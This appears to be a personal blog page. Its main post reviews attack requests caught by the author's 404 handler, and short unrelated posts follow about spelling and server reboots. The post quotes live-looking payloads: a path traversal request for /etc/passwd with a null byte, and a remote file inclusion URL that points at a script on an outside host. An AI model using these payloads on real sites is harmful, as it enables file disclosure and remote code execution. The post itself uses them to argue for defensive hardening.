So, since I upgraded the main narc.ro site, I got a custom 404 handler in the bargain — one that emails me whenever it’s hit. Okay, so it initially sent 500 Internal Server Error, but I’ve fixed that part.

Anyway, the result of this is that I get a whole bunch of very fun emails when people try to hit pages on narc.ro that don’t exist, such as:

• http://www.narc.ro//gazelle/?template=../../../../../../../../../../../../../etc/passwd%00
• http://86.104.40.152/roundcube//bin/msgimport
• http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f

I hope I don’t have to tell you not to visit those links — they don’t do anything (except email me, which is annoying).

I’m particularly interested in the first on that list, which is also the most recent. The theoretical narc.ro/gazelle path would have been /opt/www/vhosts/www.narc.ro/htdocs/gazelle. Let’s count the ../es in the path our attacker tried — 13 of them. More than enough to get out of the 6-level deep path and into /. And I probably don’t have to tell you that /etc/passwd is a file you really want to guard pretty well — it has all your users in it (/etc/shadow has the hashed passwords, too, but that one’s protected so an ordinary user (or the apache user) would be unable to read it).

So, what protected me, in this case? Firstly, it was the fortunate fact that the script the attacker was trying to hit doesn’t exist; and second, that wherever I have scripts that are able to take user input for a path (for instance, img.narc.ro works like that), I’ve been careful to put in protection against relative path inputs like that one. http://img.narc.ro/../ just won’t work.

This is a semi-adequate level of protection for me, since I write my own scripts — I don’t have to worry about any mistakes made by anyone other than myself, and I’m pretty careful around this stuff.

But note that I am some random corner of the Internet almost nobody knows about, and I’m still getting attacked. That means no matter who you are, if you’re serving Web content, you must take precautions. And even if you’re the only developer on the system, you should still do your best to contain the threat. Defense in depth should be your key phrase. That’s why I’m currently looking into mod_chroot for my Apache2 installation. Your solution may be different, but have one, or at the very least, be aware that you will be attacked, and have some plan to recover from that if, or when, an attack is successful.

For the girls among them, I finally have something to say: “You can’t be female, you have no periods!” Evidently, this can work similarly on a male (“You must be a guy [...]“).

I’m very amused by what that says about me… does it make me seem female?

On a more serious side-note, what irritates me about people who spell and punctuate badly is that I tend to be chameleonic, in that I pick up other people’s accents and such, and I’m terribly afraid of ending up with their bad spelling. And grammar. And punctuation. Which is why correcting them is therapeutic for me. So, um… anyone need a copy editor?

I noticed it had been up for 27 days. So I rebooted it. Let’s see if that solved the issue…

Update: Okay, now I’m pissed. That didn’t solve anything. Let’s try rebooting Hermes…

Update 2: Well, at this point, I’ve rebooted everything, and I’m pretty sure the problem’s not on my end. I guess I’m gonna have to ask around later. Or, you know, it might actually be working, heck if I know. It’s times like these I wish I had a host outside my immediate network to use for a nice telnet. Not too far outside my network, though. For far outside my network I have the Canadian folks’ servers (though I probably shouldn’t be using them).

Update 3: It started working again after about 24 hours. No explanation for what went wrong. *shrug*